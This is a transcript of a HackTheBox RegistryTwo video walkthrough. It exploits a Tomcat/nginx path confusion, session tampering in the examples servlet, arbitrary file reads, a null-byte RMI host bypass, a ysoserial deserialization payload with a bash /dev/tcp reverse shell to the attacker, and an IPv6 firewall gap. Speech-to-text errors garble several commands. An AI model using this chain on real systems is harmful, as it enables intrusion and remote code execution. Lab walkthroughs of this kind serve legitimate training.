HackTheBox RegistryTwo

IppSec · Beginner ·☁️ DevOps & Cloud ·2y ago

Key Takeaways

The video demonstrates a cybersecurity attack on the RegistryTwo box, exploiting vulnerabilities in the Docker registry and RMI service, and using various tools such as Nmap, curl, and Java Decompiler. The attack involves obtaining an auth token, accessing the registry catalog, and executing commands on the RMI server.

Full Transcript

what's going on YouTube this is ipag I'm doing registry 2 from hack the box which was an extremely intimidating box because of all the Java you have to exploit but it was really well put together in each step built upon the last one so it's really rewarding to complete it starts off with the typical engine X Tomcat path reversal of the do do semicolon and you use that not to access the admin or manager interface but to access the examples directory that's there by default and there's a serlet there that lets you modify stuff in your session and you use that to gain administrator from there you do some magic but there is dation with Yu seral you have to do then you have to exploit a RMI listener and then after that you have to stand up your own RMI server so when the antivirus thing goes to scan something it pulls a config from your ormi server and you give them a dangerous config that leads to it exfilling a bunch of files to a place you can read there's a lot of ways to go through this box I'll try to cover them all but let's just jump in as always we're going to start off with an end map so- SC for default scripts SV enumerate versions OA up and off formats put the N end map directory and call it registry 2 then the IP address of 1010 11223 this can take some time to run so I've already ran it looking at the results we have quite a few ports open the first one being SSH on Port 22 and its Banner tells us it's an Ubuntu Server we also have https on 443 it's Banner tells us it's engine X also running on Ubuntu and it's redirecting Us todd. webhosting.com in and then I always like whenever um I have like a dub dubdub also putting the parent so webhostinghub because I don't want to have to specify dubdub duub every time right so it redirects us uh we have the certificate save free hosting doesn't look like anything else is in the sht here on Port 5000 we also have https and its title says it's a doca registry API 2.0 its certificate is just star. webhosting.com map so let's go ahead and take a look at the site so I'm going to go to htps dubdub dub. webhosting htb and we get the page if we navigated to what was it htps dubdub web hosting Port 5000 uh let's accept the certificate we just get a blank page there and 50001 let's accept this we get the Acme off server so when I actually did the Box initially I skipped this whole um step on Port 5000 50001 I'll show you how to skip it when we get there but let's go enumerate this now so you see everything this box has to offer so I would start by just Googling what Acme off server is and we see it's a doco registry authentication server so this is the authentication server if you look more into it you don't understand exactly how it works it's just a um very vanilla thing that you stood up um probably in a really bad configuration when we look at it deeper but let's go ahead and look at Port 5000 so I'm going to do a curl DK htps uh 10 10 11 223 Port 5000 if we just look at the headers here it doesn't really tell us that much um we just have a HTTP 2 200 but if we induced a 404 message so I'll just do that we can see we have the distribution API server in the header registry 2.0 so this is probably how nmap discovered exactly what its purpose is and if you look more into exactly how the docka registry works a lot of it goes under this V2 directory and when we access it we get a authentication required and we can see the header is telling us where to authenticate it wants us to authenticate to webhosting.com want to grab the catalog but this is behind authentication so let's go make a token and this is going to be what I'm talking about the docker by default is in a horrible configuration it's more just a development testing thing right this is not meant for pro just running this vanilla like this because if I request it I get a token but this token actually isn't going to work right away we have to specify some things right so if I specify the header and it's a authorization Bearer token which most most of these tokens are when you get it's always authorization bear for apis um we just get authentication required I can put it to JQ so it's a bit prettier and if we wanted to let's see I'm going to go to JWT doio and paste this JWT doio because this will show us the token a bit better we can see what it looks like it's just again a JWT so what we want to do is specify what service we want um and we want the registry catalog permission so we can access the catalog and then in the actual um header we have the service so we want two parameters in this off and you'd have to read all the documentation um to understand exactly how this works but I'm not going to show it since I skipped it if you want to know probably check out o xdf straight up he did it this way so he understands this much better better than I do but if we just specifi the parameters um what is it we want service is equal to Docker plus registry because we URL en code it and then what is the next thing was it component or catalog I may have to go read the documentation anyways does it tell us name [Music] catalog yeah I'm going to have to go look at the doation CU I forgot the pr name so let's see let's go over to google.com and I'm going to Google generating Docker off token Let's see we go here this looks like it's using the docker binary I don't want that let's see curl this looks better oh here we go and scrolling let's see requesting a token so we have service offline client ID scope scope is what I want so I'm going to say I want the um scope of the registry catalog of everything I believe so that will give me the ability to request the catalog which will show what Dockers are available on the system uh we have to put that in single quotes because I have Ampersand uh I think we have to do slash off and that was in the header right we have web hosting SLO I forgot to put that so we have this token now let's try this with a new one so I'm going to go here and then control delete to delete Words I finally have that in my muscle memory we run it and we can see there is one repository this hosting app so if we wanted to we could try pulling this so if I do a Docker pull oh was it is it web hosting htb Port 5000 hosting Dasa uh we have a certificate and Docker used to have a-- um insecure was it registry option but that got removed recently I believe so we can't just do like the equivalent of DK to accept theer so we have to um tell our um OS to accept it so I'm going to download theer with open SSL so we'll do open SSL s client show Sears connect webhosting htb Port 5000 and let's see do we have it there it is so I'm going to grab theer because this will be the ca certificate V registry 2 doert I should do like dc-t but oh well um put it there and then and actually it's CRT we'll do CA there we go so I'm going to move it into user local share CA certificates and then we want to do a update CA certificate command so this is going to take all the certificates we have put them into our Central certificate thing where we trust certificates I guess on Linux I don't know a good way to explain that quickly but I'm just going to now restart the docker service cuz if I don't it's not going to pull from the new thing I believe I think I have to restart the servers yeah so let's do pseudo service Docker restart I know I probably should use system CTL restart Docker but pretty much the same thing and now if I do this Docker pull it's actually going to work and pull this image down so once we have this Docker image we will be able to run it then we could exec in it and um start extracting files what this Docker image is it's going to be hosting app which is the web application here right so this is going to pretty much conclude the whole Docker section I just want this download to complete so I can run it and then I'm going to forget I ever pulled this Docker and we proceed like we never did I'm going to do DOA run hosting Dasa is it-it sh hosting app let's see unable to find image do have to specify Docker images Docker run hosting I'm going to put this whole thing in I don't think I need it yeah I do okay so let's close out of this I can do a Docker PS Docker exact d it a 926 sh I just pulled it from here and now we're in the docker container so awesome I'm just going to kill this and then let's proceed like we don't even have knowledge of that so we have this web hosting server um we could run gobster it's not going to help us so I've already wasted enough time looking around at that Docker thing so I'm not going to worry about it uh the first thing I like doing is looking at the header so if I curl this DV um we need to do a d k or I can just go to burp site burp s would probably better right now so let's switch over and start using burp so we have that let's turn proxy intercept on by refresh this page get back to burp examine the headers let's see what we have we have the server as engine X and nothing really else here so we want to try to identify like the underlying technology and I know we have the docker we could just look at it ourselves but that spoils the fun right so I'm going to look at the registration page and I'm going to register the name let's do ipac root i.r password of password and then we intercept this request and something sticks out right now we have a j session ID so we know this is going to be um Java on the back end and if I send this one to repeater let's see what's it say does it say anything back no we just get J session ID so we know this is Tomcat behind engine X and whenever we see that we always think of um some type of like URL confusion thing uh email's taken because I played it in repeater right so we've already made this so let's get out of sign up and let's do sign n come on so let's do root at i.r password of password so knowing this is Tomcat there is something we could do here um I'm going to send this over into repeater and we can play with it so this weird bug happens um because engine X is not going to translate this to up or engine X let me think how to say this um let's go to Orange s um ssrf engine X Tomcat this will probably be a good query to pull it up I turn BP Suite intercept off it always goes back to this presentation let's see so what exactly is happening here again I'm pretty sure um when we send this engine X doesn't treat this as up One Directory but Tom Cat does because Tom cat's pretty much going to strip off the semicolon I believe I bet if you go to like ip. RS uh rocks let's say Tom CAT engine X I would look at this video because I probably go into that much more in depth the first time I cover things I tend to remember them better because I spend a lot more time researching it but now I kind of just take it for granted when I see Tomcat I play with this so if we make a request to period we get a 302 two dots we get a 44 two dots and a slash we go back to hosting if we put this here we just get blank that's completely different and that indicates that this is vulnerable right so we have again 404 uh that is 404 as well let's see do this up One Directory huh I don't know why it was blank there maybe it just took a long time to respond but if we wanted to we could der bus thing so this is where you normally go to like SL admin and hope the admin is exposed um manager is another common one and we can see that is redirecting us to manager HTML and then we get a unauthorized so we need to get some type of credentials here um I believe it can also be locked to IP address maybe I don't know but that is one place we can access there's another one that's in a lot of bug bounties which is examples and we can see that redirects us here so we want to keep in mind we'll be able to access this examples page right so if I went there we go to web hosting do do semicolon examples and make sure you put the trailing slash on it uh there's a serlet example and in this is a very very dangerous one of the sessions and this will let us um modify the session we can see our current session says um our username is IPC and this is our uu ID so if we start playing in this application if I go to domains create new um let's just do please subscribe I refresh my session nothing really changes there but if I go into this edit button then something's going to get added to my session and we'll be able to see that here see we see the variable s editing media so so since this is added to my session it lets me edit it in this examples thing and this is why examples is a very dangerous direct um thing to include a lot of the previous heck the Box machines we always could just go to like admin or manager and upload a war file and get code execution that way this is a little bit more difficult um because those are blacklisted a lot of places now don't allow loading that but the examples directory is still there and we can do really cool things by editing our session right so we can see this is pointed at this file if I go here um that file is going to be this so if I just pointed this to let's say ety p WD submit the query then I'm going to refresh this page and we had the past WD of the server so we have a pretty cool lfi here right um let's go and edit this to be proc self command line and then I'm going to refresh we can see the command line of our process so I'm going to look at this so v um CMD line let's oops paste it like copy the whole thing is only copying because there's a n bite or something that's weird um so let's just look at this we got the Java app then we have a logging config and we could include this and that's going to tell us how the application's logging I guess we can I normally don't look at loging do properties um I normally just do like defaults but it doesn't really give us that much uh we know like uh was it user local Tomcat is the location but I'm going to change my session let's now include this logging file logging properties because this may make it a little bit more intuitive 74 lines so we can see logging is going to go to SL logs Catalina 90 days I'm looking for the file format maybe because it's 90 days let's see if my rambling doesn't make sense here it probably will in just a second so what we want to get is the name name of the war file and the war file is a think like a jar file in Java but it's for web so it's just a zip of a bunch of java e things and enumerating the processes won't ever leak the war name the best way is to get the Catalina logs which is just what um I don't know what Catalina exactly means in terms of Tomcat but the Catalina logs are what you're after so I think from here we can determine that logs are daily so either it's going to be in let's see let's go back here you'll either want to go was it user local Tomcat is where we saw the comp it would be log catalina.out is one location and then it can also be um Catalina Dot and then the log name and the format is normally I want to say 20 24 that' be year and then month will be a one and then day today is the 31st I believe I think it's log when it's specified this way and there may be a dash here um can I just Google this Google.com Catalina log file name year year year let's see does it tell us Catalina dot year year year Das Monon month- DayDay I think that's the format so let's try grabbing today's Catalina log so if I submit that we refresh this please say some lines we have three lines so that did not work let's see what could the log be oh um it's not periods between the days it's dashes right if I go over here there we go dash dash so that was probably my issue going to submit the query refresh don't say three lines there we go 388 lines so this is going to be the Catalina log right um it's not the wine mixer it's the log so if I'm just going to search for war because what I want is war files we see deployment of the web application archive user local Tomcat web apps hosting War um normally I also try to grab ear files I forget exactly what these are but it's another thing that's common on Tomcat this doesn't have it we just have a war file so we just want to grab this one so I'm going to go back into my session we'll do s and then grab this and submit the query so now this file disclosure Vol ability should leak the um War file name and since this is going to be a zip it's going to be huge um I'm going to send it to repeater real quick let's copy I did this so I can right click to copy as a cur item because when I forward this it's going to be hard to copy out of this window right and I hate doing like the view Source thing because the browser is going to get all wonky so um let's I don't know what file I was in CMD line okay um let's paste the Cur line I'm going to do- O and I'm going to call this temp. out real quick so it's going to download that we can see this is still trying to load oh probably because I've intercept on 22 Megs 18,000 lines and it's going to be printing pretty awful so oh shoot I should not have closed that actually oh well I think we are done with that one for a second because we have the file saved so if I do V temp. out we can start carving this file and one helpful thing when you have a huge file that's going to stem a lot of lines is turn your syntax highlighting off so syntax off and I'm just going to delete until we see the file and it's going to be apparent because that huge A to B blob is the file so let's delete everything up to that line and I'm going slow around it because every now and then it still will be um clunky since this file is so big or this line so delete Del like that I accidentally deleted one too many there we go and I'm going to hit the dollar sign to go to the end of the line and then it's going to take a hot second for it to go to the end and one two three X's is it going to delete come on there we go I deleted one delete that maybe I should went in insert mode and deleted I don't know why this is taking so long um I think we're good I did not see exactly what it did I blinked and it disappeared I think there's another option to like disable fancy redraw or something on Vim because I think it's having a hard time positioning that whole line I'm going to hit up again I want to see it still have two equals has one equal I gave it a second equal I think and then I think it has to redraw this whole line um Vim disable redraw is that it let's see I forget the exact function but I think we have it so let me delete everything let's save it Bas 64- D temp. out fix that command and I'll call it hosting War we don't have any error messages and if I do a file against hosting War we have a jar archive so that is the other way to get this um the intended way again boot up that Docker that we had done and then use like spin it up extract the file out of there but I think it's funner just to do the file disclosure vulnerability like we showed so having access to this war file we want to um decompile it and to do that I'm going to grab JD goey so I'm going to go to Google we'll do JD goey and that's going to let us open this and view all the good source code of it right so I'm going to go to download download that version uh let's stick it in in htb registry 2 and I'm going to call it JD gooey. jar and let's see I'm going to make a directory bin I'm going to move all the files I like using in this directory because there's going to be a few other apps we just get so I'm going to do um Java djar JD to load this up and then let's do file open file up One Directory hosting war and let's see is there a config I don't see a config to make this font bigger um oh sweet I can just do control sweet so having access a source code I'm going to go in web imp classes htb hosting and this is going to be where all the code is I'm going to expand all these so we can look at them and then where do we want to start um constants is normally a good thing you can see all the constants in a file and we can see um the variables like s is user Ro manager we didn't see this one but having access to that examples we can set our Ro which would be pretty cool um let's see other things we can do if we go to the authentication serlet that's another place I would start you can see when you log in we have a validate um we set the login uuid displayed username and then we get the role and then we also will set this is logged in role manager um another thing let's see I don't know a good way to do this in JD goey um if we went to some servlets we could see like this web serlet right I don't know if there's a good just search option let's do at web we serve do we see yeah I don't so what I'm going to try to do let's save all Source I'm going to save it here and then I'm going to open up in vs code or we can just grap it because I want to see all URL endpoints and it like drives me crazy I can't find like a router file that I'm used to in like any other web Lang language that just has a list of all the routes they like doing this web serlet thing here so that drives me crazy but this is my work around right so make Source let's go in here um I'm going to unzip the hosting War Source zip I'm going to make a directory called hosting move everything into it because we're probably going to have source of other things right and now I can just do a grip command since I have all the source code um let's just do our I web serlet is that going to work uh let's see web seret comma or parentheses name there we go so this will tell us a list of pretty much like the routes so we have off signin autosave reconfigure panels domains edit log out profile all sign up and view reconfigure it is one we haven't seen so if we look at this that's in the configuration serlet Java so we can go here look at reconfigure and let's see um we do a get it's going to do this check manager thing if we click on check manager it again wants this is logged in role manager so what we want to do is set this attribute for us so I'm going to go back into the session example and let's go back to web hosting panel wonder if we have to we won't have to relog in because it's setting the session so we can see right now we have that I'm going to set this user logged in manager to True submit and now I have that um session and we have a new field configuration and then reconfigure so we can reconfigure something here um we have Max domains five we could change that we can change the index template but if we look we can actually set any parameter so it's kind of like a mass assignment thing here because if we go back here and save this let's turn intercept on WE submit we can see we set these two variables right but if we look at the code what it's doing is it's just getting the any parameter we send putting them in this map and then updating them oh God I did not mean to click settings there we go so since we can edit any setting we could also edit um what the server uses to talk to there is MySQL somewhere here but getting code execution through MySQL it is possible but it is much much more challenging um I like using RMI wherever I can and we see there is a variable here to set RMI do host and we see it does check when it loads this if RMI host contains. htb then or if it doesn't contain htb then it's going to set it this way however if we put a null bite here we can um include htb but when it uses RMI like the actual host it gets terminated it's just like um PHP right so what we're going to do is set RMI host and we're going to point it back at us and then put a all bite in and then htb so that way it passes this check but when it goes to connect it gets terminated at the do and goes to our IP address so this is going to be the much easier way to exploit this so let's take a look um I'm going to do NC lvmp what port does it connect to um it looks like 9,2 default RMI is 1099 I believe and this is just a mapper port so you connect to the RMI Port it tells you where to go to after that we'll probably cover that later on this video but um the mapper is set to 90002 for whatever reason thankfully they do 90001 and just take my reverse shell Port um cuers to the author for not doing that but yeah let's see uh we want to set the RMI host so what I'm going to do is we'll do an and and then RMI do host is equal to 10 1048 and I guess we can do this um first without the null bite right so if I did that and then let's turn this oh hold on I'm going to drop that request if I did that in the repeater Tab and then for it it would have deleted it so I'm just going to turn burp site off real quick because we no longer need it for now so if I refresh here uh we can go domains click around um I never get a call back because again that one if then is getting checked and it's resetting it to the htb value but now I'm going to turn repeater I'm going to do a nb. htb we're going to send it so now we have updated it to set rm. host is equal to rip and then I'm going to refresh this page uh maybe we have to click index I could have swore I was waiting for a connection see what did I do wrong so we set 10 1048 that is my IP address um NC OV NP 1099 I'm going to listen on that for good measure maybe I just need the N bite and don't do htb let's see what am I missing we set domains and ri. host uh let's see class ri. host I believe that's correct let's just pend the htb again and try this again so we send this we ought to match I am listening on 902 see let's go back there we go I am not sure what happened before but now we actually error whenever we try something maybe that's when we view a file right but now we're getting a connection back to us on um this interface so what we can do is now perform a deserialization attack and a lot of people at this point use yo serial and I am going to but one thing I really like nowadays um I know the library is going to be a bit older because it hasn't been updated you got the default yo serial but when doing RMI exploitation quite a while ago I forget what exploit made it popular maybe it wasn't RMI maybe it was log 4J um I found this y soio modified library that I absolutely love and the whole difference is this will allow us to do shell redirection and they explain it pretty well in this whole description so the default like um y serial has the exact running like this and when you do it this way um you can't really do any type of redirection which sucks because if you want to do like a oneline shell you just can't um or you can but you have to do a lot of weird escaping maybe um it's not easy to do a oneline shell in the regular version of YSU Cal what they essentially change it to is like this so we put the bin bash or Binh in front of it- c and then the command if your container doesn't have Binh so if it's like a Docker scratch container that's mainly used in golang applications you're out of luck but I don't know many people that use Docker scratch um so almost always you're going to have a SL bin slsh and then the command is done this way so now all the redirection works just fine you don't have to worry about escaping and things like that so that's why I'm using this y so serial modified now the painful thing is there's no exact release and getting this to run isn't the easiest so we're going to go to this poll request and they have um a Docker file so I'm going to pull it from haters repository and there is going to be even some changes to this one because I guess libraries updated or something so we'll go make all those changes so I'm just going to do a get poll on this one right yeah uh get clone not pull and then we can go in y so area modified and then if we do was it Docker build dot-t I'm going to name it y ISO serial it's going to pull all the containers down and then when it tries to build I'm 90% sure it's going to fail and there's going to be two small changes we have to make so I'm going to speed up the video so you don't watch it extract all this and we'll get to the error message and we have the first error so we have could not find artifact Java X Interceptor stuff 3.1 so if we Google this error and let's see it's going to tell us we should use um 1.2 as the spec instead of 3.1 so we want to find this so where is this file um I think this is in pom.xml maybe yeah so v p XML 3.1 maybe Interceptor API this one and change 3.1 to we said 1.2 right 1.2 saved and that was- API so now with that changed we're going to build it and it's going to um error again and the next error is going to be related to the Java version because I think Java that's in this Docker um isn't really supported anymore so it's not on the docker Hub and the thing we're going to do is change it to use open jdk um the reason why we're just not going to update Java to the latest is there's a bunch of issues on Yo serial of it just not working with the latest version of java I don't know exactly where those issues are so I can't pull them up but take my word for it you want to use an old version of java with yo serial so I'm going to let this finish we're going to zip to the end to where the error message is and here we go step 10 out of 13 we have an error it says from java 8 jdk Alpine it can't find it and the reason why again is this is a old container so it got deprecated um the answer is not a great one because we're going to replace Java with open jdk and I say it's not a great one because this repository is also deprecated so let's rebuild this and it should build relatively quickly but the best answer would probably be finding the latest version of java that y so seral supports and switching it to use that one if that's not um removed from the docker registry but this gets us to where we're working right so we have successfully built it and tagged it so I can do a doo run and then why so serial and we see the output so for this we actually want to use this in a different mode um and by that let's see a good way to explain this the entry point we're doing Java djar y so serial and that's just going to execute and hit the like main function which doesn't give us the ability to just execute a call in the jar so we want to execute it with- CP which lets us execute specific functions in this that are not exposed to main so what I'm going to do is find out how to exit Vim no joke intended and and then let's see we're going to do that doco run I think it's a dash entry I think it's Dash Point as well sh and maybe it's just one thing um entry point probably goes before yo serial and we probably want to run it in interactive mode unknown flag there we go so now I'm in just the app so I can do a Java CP and before I do that we want to map a port here so I'm going to do- p 90002 92 so what this is going to do is map 90002 on my host to 90002 in this container so now we can do Java CP why so serial. jar and then I don't know a good way to know this other than just reading blog post or knowing what's in it but we're going to specify the function called yoci exploit jrmp listener and we'll do 90002 and then we can specify one of the commons collections those are super common in Java so we'll do Commons collections six um five works as well I'm sure we could look through the source code and then look at the import statements and figure out um exactly which one to use but I like just using five or six um I find them relatively reliable and then this next one is a y so serial modified ISM I think this is going to be terminal type it supports like bash Powershell and CMD I want to say it's just how it executes if you go to the man page on y serial modified you'd find out but if you're on Linux you probably want bash if you're on Windows you want Powershell probably right and now we can do our oneliner so we can do b-i Dev TCP 101048 9,10 and one like this so when I run this we have started the listener so let's start on 90001 and then I'm going to refresh this page just so we have the RMI host definitely set we go back here I'm going to refresh and we have to log in again and then I'm probably going to have to set that again I'm guessing my cookie is invalid so I edited like the whole session here I reconfigured it for this J session ID I'm guessing so I have to probably re-edit or grab a new cookie so let's just uh go to burp suite and turn intercept on refresh grab this cookie go to repeater paste this in send it uh oh we're getting a 302 oh because we have to uh let's see do we edit we have to give ourselves admin again right so let's do examples serlet uh sessions and then logged on user role manager set to true so now we have that send no longer a 302 go to hosting it's hanging we see here we got a connection read the message sent and down here we have a shell so I'm going to uh run python 3-c import PTY PTY spawn bin bash no python do we have script uh we don't so we can't actually establish a proper PTY which kind of sucks I wonder if I can export term to X term and still clear the screen I can't so that is how we get a shell on this container um and I know it's a container because if we do lsla on slash we have Docker M and what this is going to enable us to do is um interact with the host so lntp netstat we can see there's various ports the really weird thing here is um we have host networking enabled in a Docker container because we see we're in Docker environment if I do an IP address we can see we're sharing the same network as the host so we can access anything um but I'm going to get out of the shell because uh we actually could skip this step I didn't really talk about it before but this whole step could also be skipped and the whole reason it could be skipped is just um IPv6 The Next Step here is going to be interacting with the RMI service itself to get a shell but um we couldn't do that from our host because it's firewood off right we don't have access to hit just Port 90002 so if I do NC 10 10 11 2 2 3 92 zv it doesn't connect and we need to be able to hit that Port um there's also probably a high number Port we'll need to hit uh 3449 in this case but we can't hit either of those because the firewall but IPv6 we could so how do we get IPv6 well in the proc directory this is where like all tools like if config IP and stuff pull information from right I think it's in net as well uh let's see there should be I'm going to grip for six um if I at six I want to say it's the file so we have it here this is going to be the IPv6 address we can see the address the interface right so I know I grabbed this from the docker container so if I wanted to we could actually grab it from the hosting panel right so I'm going to get rid of this arm my host so we're not sending it all the time we go back into the hosting panel uh Slash hosting okay that's fine we go back to our domains we start editing something so I'm going to go edit we go back here to the session and we're going to go editing mode and then we can say proc net inore 6 was it if IET 6 if IET six submit refresh this page and then we have it so from this we could actually now just hit those ports so let's go back over to where we are trying to do net cats so let's try 34409 first right that fails but if we do the same thing and add A-6 and then put a port uh we have to put the colon so we can do a colon there colon there and I know we can simplify the IP address because of all those zeros which we will do in a second but there is a colon every four so we do that and what wonder if it change ports on me let's do 9,2 there we go so that does change ports um we go back to this one 90002 we see it doesn't work so if we we wanted to we could also simplify this so you get rid of the zeros do a double colon you can only do this once in an IP vs6 address but we do that and it also works so this is how we could just access the Box um the sensitive ports directly is because the IP tables rule only applied to ipv4 and they didn't apply it to IPv6 which is a somewhat common misconfiguration I mean I think I've shown this before um it's on one of my favorite box is sneaky um let's see IPv6 we haven't done it much but yeah we talk about it quite a bit and sneaky was the first box I found it in and this goes into some things that I learned doing this box I clicked it because I want to know when this was right um because this box was just released and this was six years ago so again the misconfiguration can happen quite often so let's see now that we have that Port let's talk about why that Port is sensitive and what we're going to do next so let's go back to the source code and it's a bit pain to search this so I'm going to go and open Visual Studio code again so Source uh hosting is I think where it was open up vs code it's going to take a second to up open but we just exploited this piece of code right there is actual stuff it's doing in RMI and if we actually communicate to the RMI server we'll be able to potentially run commands if the commands not ran on the docker if they're ran on the host then we can escape the docker this way right so we want to examine more about the RMI so let's see where are we so in the file service it's listing a bunch of functions so we can upload file delete create directory get file delete domain new domain and in the case of domain it's talking about the um host that we make uh let's see so if I go back to hosting it's probably going to want me to log in and I can disable burp just so it goes a little bit faster so we'll log back into this and we have a domain thing here so this is what it's talking about domain and this number right here string is going to be the uid or the vhost but we have all these functions that we can call um let's see was something I wanted to show this is the piece of decompiled code we're looking for string is htb registry going here but let's see let's just search for um upload file and see where this is used so we do find and file upload file and if we go to The Domain seret we can see it's very clear exactly what what this is doing because we have the RMI client it's going to upload the file the domain get virtual host and then upload index. HTML this is parameter one and this is parameter 2 right so we have pram string one we could say Vost and this one will be file and then you have bytes which is the actual file so I'm going to add undo the two edits I did because I don't want to change this Source too much because it may just break things but if we go to this one we can see again how to call it What fields we need um the first argument is going to be the vhost then we give it the um file name and I bet if I scroll over here it's doing a string to get the start template and that is um probably let's see this right so we should be able to just um upload any file we want or do any other command so let's get started by making this and the first thing I want to do is fix this package thing because we have this web imp classes come and we don't want that all over a code so I'm going to copy this and we can say replace in files and we'll replace that with nothing okay so now this looks more like a standard um library and we will let's see I'm going to close visual studio and then go into the classes directory and open up so let's go web imp classes and I can go here and then we can make a exploit. Java and start off our code so I'm going to create um public class let's see all the Java names capital I forget casing we should put a capital E here um standard Java thing I think the file name starts with a capital we can say exploit like that and we want to make a main function so I'm going to do public static void main then we can say string pergs and print out hello world run and there we go we have it so the one thing I do want to do is have the ability to change the vhost because that is going to change pretty often I believe if I go back here that's going to be this string so it's a bit of a pain to do arguments when you just click run like I did so I'm going to have it default to um this variable so we'll say vhost is equal to this and then I can say um if AR's length is greater or equal to one then vhost is equal to the first argument so now that lets us um change it for when we um um run this on the command line so now that we have that we probably want to connect to RMI so let's see if we do RMI client wrapper we just did this get let's see how does it work or my host 90002 connecting I think we could just call this right let's try this so I want to import Comm htb hosting RMI RMI client rapper and then I'm going to say um what is the variable it's a file service so maybe SV uh file service SVC is equal to this does that work uh cannot be resolved to a type so we got to import that file like that and that just the value of local variables is not used so that's just tell me service is not used so now if I do like a service dot um we have all the functions so let's do list right and I'm going to say one two three four five yeah that's fine oh that's going to be a file we want a directory so if I just specify this uh what is is this ering unhandled exception try catch print stack Trace there we go and we have to um have this returned to something right because we're just running this function um this is a list abstract file so we can say list abstract file um what do we want to call this files that sounds fine and then we Loop it and get the name let's see what this does if we run it is trying to grab Etsy hosting do let's see hosting ini find and files so it's got a config file I don't know if we want to do it this way then let's see you can probably hardcode it so public static file service get let's create our own function see wish my auto andent thing was working this has to be in dented that's better that goes there there there awesome so I'm going to call this connect RMI I guess and we'll pass a two variables we'll say do we say strings first name and Port like that method must return the result of a type maybe we just have to return so let's see we have this we want to connect to the [Music] registry like that let see I'm just doing what it did here right and then they return this unhandled exception throws exception there we go so I think we have something similar to what they did let's just say connect RMI and then remote registry htb Port 90002 does this work uh always continue compilation I got a semicolon somewhere have it have it there we go see this is a TCP error so what we're going to do is we're going to get this working through IPv6 first because it's just easier and quicker for the video and then we're going to show um doing it through the socks proxy which I think was the intended way because the whole IPv6 thing is uned so let's go where is the IP address there it is let us grab e zero dead beef grab this okay and then we can connect to IPv6 run what still getting registry run let's run in debug mode step [Music] over oh I know what's happening um RMI is a mapper so what's happening is we're connecting to 90002 here and then when we say we want to list a file it's giving us a new address so it's like an HTTP redirect think of it that way and it's putting that remote registry. htbn so I'm going to copy the address go that way then let's sud sudo VY host and put this address in we want to copy that paste no other paste there we go and I bet when we run this now it will work let's see it did not unknown host remote. registry. htb remote. registry. htb ping remote registry htb we can ping it run unknown host oh registry. webhosting registry there we go hope I have the correct name run Nest exception is unknown dyslexia moment there's no web hosting let's just copy and paste okay create connection that is embarrassing I had the wrong host there okay this is no longer a error in um the her name we're just getting a unmarshaling error abstract file class invalid for der serialization huh so we do SVC list vhost do we have the Vost wrong no that's set correctly right yep we connect do we do the loop any different is even air where is it airing is it airing at the Loop or when we get it step over we've connected we run this so we're not even getting to this piece so our error is here and I'm not sure why that is um my first thought is our code is correct and the issue is when we decompiled the library something got screwed up with this service so I want to try um just making this using the class file so we're not going through any decompilation so to do that it's a little bit complex I guess but I'm going to um let's see let's go back into a source directory I'm going to make a new one called exploit then I'm going to copy exploit. Java into this directory so we can CP exploit. Java here and then we should have the war file so we'll do 7zx dot dot slash dot dot hold on make the attemp 7zx let's get the hosting war in this one more directory and then I want to move web classes come to this directory and then we need a manifest right let's copy The Meta manifest up one as well okay and then let's see that's fine we just need to put the main class and that's going to be Comm htb hosting RMI exploit because that's what we called our file and we should be able to compile this so oh before we do we have to give this a package so this would be package com htb hosting RMI I think so we can compile this with Java C compile to Java version 8 The Source 8 exploit. Java one warning that should be fine and then we we compile the jar so jar CFM give it the file we just created oh no uh file exploit. Java what command did I run we did that oh we created the class yeah that's right jar CFM so we're going to create exploit. jar and then give it the Manifest and then every directory okay so we have it so Java djar exploit cannot find or load this you have exploit. class package com hosting I think that's fine let's remove exploit jar move exploit class into Comm htb hosting RMI let's create that jar Java djar exploit there we go and yes it does work so our code is working it's just when we have it decompiled it does not which I don't know exactly where that error came from but yeah that is not intuitive so we probably have to revisit how we decompiled this app if we really wanted to I'm guessing like using Jad or something on each class may be better but at least we see that so let's just fix up this code um I think it's going to be easier if we work with this and then just recompile we just lose the ability to do run which is annoying so where are we what do we want to do well we have this we do two dots we know at least we're in that so I guess we should create a buffered reader so let's comment all this stuff out so we have a proof of concept there um now let's do final buffered reader reader like this and let's say um while true and we can read a command off of it let's get rid of a lot of this okay so we have to probably do import statements because it can't resolve these so let's do import buffer reader input streamer okay why can't that uh unhandled exception so I guess we put this in a try statement catch that's fine let's do proper indenting okay let's see what this looks like enter a command if we do test we don't get anything if we do exit it exits so we have a menu so let's do instead of enter command I like a carrot like that and then we're going to have things like LS and then a directory right so we have the command here and we want to split it so um let's see split string on first space does it tell me how to do that string Parts two awesome wonder if we is this let's see CMD args can that do it wonder if I say string like that no I was trying to assign them both at the same time uh we can call this split and then say CMD split one urg like that then say if CMD equals exit break let's just do a switch statement CMD case exit break case LS and let's do print listing files in let's see what this looks like run do nothing that's fine LS slome there we go so we do have our AR press working fine so what else did we want to do we want to be able to um print files so we do case cat and then um we want to be able to write a file okay that should be fine and at this point we can no longer um debug a code which is going to be annoying so hopefully we write this correctly so let's grab some of this let's see here's the loop the V host don't need that we don't need the list do we need this try here is it going to error if we don't it does unhandled exception okay so here we can do that list and I screwed it up because I deleted the code that had it um we have it in this one right oops exploit. Java this is what I want okay why is this erroring cannot be resolved um so the issue here is when we're calling service here it's in this Tri block and it's essentially in these curly brackets so when it leaves this this variable gets freed and not there free is probably the bad term but we have to declare the variable outside of the brackets so let's do a file service SVC is equal to null and now we say oh now it's saying it's duplicate variable because we declared it again so if we just remove this file service call and do VC it works so I think that is good here so we want to be able to read files so let's do SVC dot let's see what is the function to get a file it's probably get file I wonder what the difference between two guessing we have to call this one because we want to give it the vhost and the argument and and let's see this returns probably bytes string two um abstract file so is it file abstract file like this file let's see cannot be resolved um let's see is there a different thing let's go back to the client wrapper that's not what I want actually file service maybe view that'll be bytes I'm guessing we give it one parameter it is just going to do like it's going to try to get the vhost by itself and if we give it two um it won't so let's say um b b is equal to view like that then we want to print the bite okay and then we want to write the file and this is also going to be extra arguments so let's see how do we want to call this

Original Description

